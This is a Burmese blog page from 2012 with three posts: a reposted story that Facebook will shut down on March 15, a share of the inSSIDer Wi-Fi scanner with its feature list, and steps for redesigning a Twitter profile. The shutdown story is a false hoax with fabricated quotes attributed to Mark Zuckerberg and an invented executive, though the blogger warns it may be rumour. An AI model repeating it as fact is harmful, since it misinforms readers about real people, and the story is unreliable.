ပာုတ္မပာုတ္ေတာ႕ကြ်န္ေတာ္လည္းေသခ်ာမသိပါဘူး၊အင္တာနက္ကသတင္းၿဖစ္ပါတယ္၊ေကာလပာာလေတြလည္း
ၿဖစ္ႏိုင္ပါတယ္။ကြ်န္ေတာ္က အင္တာနက္မွာရုတ္တရပ္ရွာေတြ႕တဲ႕အသတင္းအေနနဲ႕ေဖာ္ၿပလိုက္ပါတယ္။
" ဒီကုမၸဏီ ကို စီမန္ခန္ ့ခြဲရတဲ့စိတ္ဖိစီးမွဳ႕ေၾကာင့္ ကြ်န္ေတာ့္ ဘ၀လည္း ပ်က္ျပီ၊ ဒီရူးသြပ္မွဳ အားလံုးကို ကြ်န္ေတာ္ အဆံုးသတ္ဖို ့လိုပါတယ္ " ဟု ၄င္း က ဆက္လက္ေျပာ ၾကားခဲ့သည္။
" မတ္လ ၁၅ ရက္က်ရင္ Website တစ္ခုလံုး ပိတ္ပါျပီ " ဟု Facebook မွ နည္းပညာေရးရာ ဒုတိယ ဥကၠဌ Avrat Humarthiက ေျပာၾကားသည္။ " ဒီေတာ့ ခင္ဗ်ားတို ့ကိုယ့္ပံုကိုယ္္ျပန္ျမင္ခ်င္ေသးရင္ ဒီပံုေတြကို အင္တာနက္ ကေန ဖယ္လိုက္ေတာ့၊ Facebook လုပ္ငန္း ရပ္ဆိုင္းသြားရင္ အဲဒီပံုေတြ ျပန္မရႏိုင္ေတာ့ဘူး" ဟု Avrat Humarthi က ဆက္လက္ေျပာၾကားခဲ့သည္။
ဤ ဆံုးျဖတ္ခ်က္ကို ခက္ခက္ခဲခဲခ်ခဲ့ရေၾကာင္း၊ သို ့ေသာ္ ျပည္သူမ်ား မေက်မလည္ ကသိအေအာင့္ ျဖစ္လိမ့္မည္ဟု မထင္ပါေၾကာင္း Mark Zuckerberg က ေျပာၾကားခဲ့သည္။
ရိုးရိုးေျပာရရင္ ပိုေကာင္းဖို ့ျဖစ္လာတာလို ့ထင္ပါတယ္။ Facebook မရွိေတာ့ရင္ လူေတြ အျပင္ထြက္ၾကမယ္။ တကယ့္လူသားမိတ္ေဆြသူငယ္ခ်င္းေတြရလာမယ္၊ ဒါဟာ ဘယ္ေတာ့မဆိုေကာင္းတာပဲေလ " ဟု Mark Zuckerberg က တယ္လီဖုန္းႏွင့္ေမးျမန္းမွဳတြင္ ေျပာၾကားခဲ့သည္။
ဒီထတ္လန္ ့တုန္လွဳပ္ဖြယ္ သတင္းကိုၾကားေတာ့ Facebook သံုးစြဲသူ တစ္ခ်ိဳ ့ဟာ ေဒါသတၾကီး ေပါက္ကြဲၾကတယ္၊ Facebook မွ မရွိရင္ ကြ်န္ေတာ္ဘာလုပ္ရမလဲ လို ့ အင္ဒီယာနာ မွ အထက္တန္း ေက်ာင္းသား တစ္ဦးျဖစ္သူ ဒင္းနစ္ဘရက္ေရွာ က ေျပာသည္။
ပာုတ္မပာုတ္ေတာ႕ကြ်န္ေတာ္လည္းေသခ်ာမသိပါဘူး၊အင္တာနက္ကသတင္းၿဖစ္ပါတယ္၊ေကာလပာာလေတြလည္း
ၿဖစ္ႏိုင္ပါတယ္။ကြ်န္ေတာ္က အင္တာနက္မွာရုတ္တရပ္ရွာေတြ႕တဲ႕အသတင္းအေနနဲ႕ေဖာ္ၿပလိုက္ပါတယ္။
Sunday, January 15, 2012
inSSIDer- WiFi Network Scanner tool
ကြ်န္ေတာ္ wi-fi
scanner ေလးတစ္ခုတင္ေပးလိုက္ပါတယ္၊ဒီပာာေလးကိုေတာ႕http://shwekoyantaw.blogspot.com ကေနယူၿပီးတင္ေပးလိုက္တာပါ၊
features
- Compatible with Windows XP, Vista and 7 (32 and 64-bit)
- Uses the Native Wi-Fi API and your current Wireless network card
- Sort results by MAC Address, SSID, Channel, RSSI and "Time Last Seen"
- Compatible with most GPS devices (NMEA v2.3 and higher)
How can inSSIDer do?
- Inspect your WLAN and surrounding networks to troubleshoot competing access points
- Track the strength of received signal in dBm over time
- Filter access points in an easy-to-use format
- Highlight access points for areas with high Wi-Fi concentration
- Export Wi-Fi and GPS data to a KML file to view in Google Earth.
- Filter through hundreds of scanned access points
Tuesday, January 10, 2012
twitter ကိုဒီဇိုင္းေၿပာင္းသံုးမယ္.....................
လူမႈကြန္ရပ္ ေတြထဲမွာ twitter ကလည္းဆရာတစ္ပါးၿဖစ္ပါတယ္ . အခုခ်ိန္မွာ Facebook အရမ္းေခတ္ထေနတဲ႕ အခ်ိန္ၿဖစ္ပါတယ္ .ဒါေပမယ္႕ Twitter ကလည္း သူ႕ မိတ္နဲ႕သူ ဆရာတစ္ပါး
အၿဖစ္နဲ႕ ရပ္တည္ေနဆဲပါ…. ပံုစံေလးကလည္းမဆိုးပါဘူး. Facebook ကလည္း ပိတ္သိမ္းေတာ႕မယ္
လိုလုိ ဘေလာ႕ေတြမွာေတြ႕ေနရပါတယ္. ကြ်န္ေတာ္ တို႕လည္း Twitter ေၿပာင္းသံုးရေအာင္ …
အခု ကြ်န္ေတာ္ တင္ေပးလိုက္တဲ႕ post ကေတာ႕ Twitter ကို ပံုစံေၿပာင္းသံုးမယ္႕ပာာေပါ႕၊
အဆင္႔တစ္ေနနဲ႕ https://twitter.com မွာ log in လုပ္ပါ(twitter အေကာင္႕မရွိရင္ေတာ႕ sing up လုပ္ေပါ႔)
ေနာက္ အေပၚမွာရွိတဲ႕ navigation bar တြင္ Settings ကိုႏွိပ္ပါ.
Design tab ကို ႏွိပ္ပါ။
Template ေတြအမ်ားၾကီးေပၚလာပါလိမ္႔မယ္၊ ဒီအထဲကၾကိဳက္ႏွိပ္သက္ရာ template ကိုေရြးလို႕ရပါတယ္
ဒါမွမပာုတ္ရင္လည္း change background image ကိုေရြးၿပီး ကိုယ္ပိုင္ background image ထည္႕ေပးလို႕ရပါတယ္ ၊ background image အတြက္လိုအပ္ခ်က္ကေတာ႕ PNG /GIF/JPEG format ၿဖစ္ရန္လိုအပ္ၿပီး 800K ထက္ေတာ႕ေက်ာ္လို႕မရပါဘူး၊ၾကိဴက္ႏွစ္သက္တဲ႕႔ Background ကိုေရြးၿပီးရင္ေတာ႕
Save လုပ္ပါ၊ Profile စာမ်က္ႏွာရဲ႕ sidebar နဲ႕ font ကိုေၿပာင္းလိုလွ်င္ေတာ႕Change desing colors ကို ႏွိပ္
ႏွစ္သက္ရာအေရာင္ကိုေၿပာင္းၿပီး Done ကိုႏွိပ္လိုက္ပါ ။ ကဲဒါဆို Twitter လွလွေလးသံုးလို႕ရၿပီေနာ္….
Subscribe to:
Posts (Atom)